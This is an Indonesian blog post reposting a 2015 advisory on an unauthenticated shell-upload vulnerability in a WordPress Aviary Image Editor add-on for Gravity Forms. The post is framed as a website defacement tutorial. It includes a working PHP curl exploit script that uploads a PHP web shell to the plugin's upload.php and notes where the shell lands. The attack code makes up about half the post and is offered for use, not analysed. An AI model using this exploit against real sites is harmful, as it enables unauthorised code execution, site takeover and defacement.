WordPress Aviary Image Editor Add On For Gravity Forms 3.0 Beta Shell Upload Vulnerability

Assalamualaikum,

Kali ini ane mau share Exploit WordPress Aviary Image Editor Add On For Gravity Forms 3.0 Beta Shell Upload Vulnerability, langsung saja yuk :D

= Author: Larry W. Cashdollar, @_larry0
= Date: 2015-06-07
= Download Site: https://wordpress.org/plugins/aviary-image-editor-add-on-for-gravity-forms
= Vendor: Waters Edge Web Design and NetherWorks LLC
= Vendor Notified: 2015-06-08
= Advisory: http://www.vapid.dhs.org/advisory.php?v=125
= Vulnerability in 'upload.php': BLANK Page
=======================================================================

Vulnerability:

There is a remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms/includes/upload.php as an unauthenticated user can upload any file to the system.  Including a .php file.  The upload.php doesn't check that the user is authenticated and a simple post will allow arbitrary code to be uploaded to the server.

Exploit Code :

<?php

/*Remote shell upload exploit for aviary-image-editor-add-on-for-gravity-forms v3.0beta */
/*Larry W. Cashdollar @_larry0
6/7/2015
shell will be located http://www.vapidlabs.com/wp-content/uploads/gform_aviary/_shell.php
 */

  $target_url = 'http://www.vapidlabs.com/wp-content/plugins/aviary-image-editor-add-on-
for-gravity-forms/includes/
 upload.php';
 $file_name_with_full_path = '/var/www/nameshell.php';
 echo "POST to $target_url $file_name_with_full_path";
 $post = array('name' => 'nameshell.php','gf_aviary_file'=>'@'.$file_name_with_full_path);
 $ch = curl_init();
 curl_setopt($ch, CURLOPT_URL,$target_url);
 curl_setopt($ch, CURLOPT_POST,1);
 curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
 curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
 $result=curl_exec ($ch);
 curl_close ($ch);
 echo "<hr>";
 echo $result;
 echo "<hr>";

 ?> 

Sekaian dan Terima Kasih,
Wassalamualaikum wr.wb

Cara Deface Dengan Aviary Imaege Editor
Deface Dengan WP Aviary Image Editor